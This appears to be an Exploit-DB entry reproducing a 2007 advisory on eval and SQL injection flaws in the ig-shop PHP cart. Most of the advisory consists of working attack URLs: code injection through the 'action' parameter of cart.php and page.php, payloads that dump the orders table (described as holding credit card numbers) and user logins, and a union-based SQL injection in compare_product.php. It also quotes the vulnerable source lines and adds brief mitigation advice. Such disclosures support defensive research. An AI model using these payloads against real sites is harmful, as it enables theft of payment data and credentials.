header-logo
Suggest Exploit
vendor:
ig-shop
by:
Michael Brooks
N/A
CVSS
MEDIUM
Eval and SQL Injection
20
CWE
Product Name: ig-shop
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

ig-shop Eval and SQL Injection Vulnerabilities

ig-shop suffers from two eval's that can be controlled by an attacker. The eval statements can be exploited through the following URLs:- http://127.0.0.1/ig_shop/cart.php?action=;phpinfo();//- http://127.0.0.1/ig_shop/page.php?action=;phpinfo();//There is also an SQL injection vulnerability in the compare_product.php script, which can be exploited through the following URL:- http://127.0.0.1/ig_shop/compare_product.php?id=1%20union%20select%201The vendor's page is http://www.igeneric.co.uk/

Mitigation:

To mitigate these vulnerabilities, the vendor should ensure that user input is properly sanitized and validated before being used in eval statements or SQL queries. Additionally, the vendor should implement measures such as parameterized queries or prepared statements to prevent SQL injection attacks. It is also recommended to keep the software up-to-date with the latest patches and security updates.
Source

Exploit-DB raw data:

"If eval is the answer,  then you are asking the wrong question."
--Unknowen

ig-shop suffers from two eval's that can be controlled by an attacker:
http://127.0.0.1/ig_shop/cart.php?action=;phpinfo();//
./cart.php line 692:
eval ("cart_$action();");

http://127.0.0.1/ig_shop/page.php?action=;phpinfo();//
./page.php line 336:
eval ("page_$action();");

Dumps all credit card numbers:
http://127.0.0.1/ig_shop/cart.php?action=;$q=mysql_query(stripslashes($l));while($a=mysql_fetch_array($q)){print_r($a);}//&l=select%20*%20from%20orders
Some of these variables can be decoded using the unserlize()  funciton.

Dumps all logins:
http://127.0.0.1/ig_shop/cart.php?action=;$q=mysql_query(stripslashes($l));while($a=mysql_fetch_array($q)){print_r($a);}//&l=select%20*%20from%20users


sql injection works regardless of magic_quotes_gpc.
http://127.0.0.1/ig_shop/compare_product.php?id=1%20union%20select%201
./compare_product.php line 11:
$qry_txt="select type_id from catalog_product where product_id=".$HTTP_GET_VARS[id];
Should have used quote marks. 

vendor's page:http://www.igeneric.co.uk/

By Michael Brooks. 

# milw0rm.com [2007-01-05]

Navigation

Suggest Exploit

Services By CQR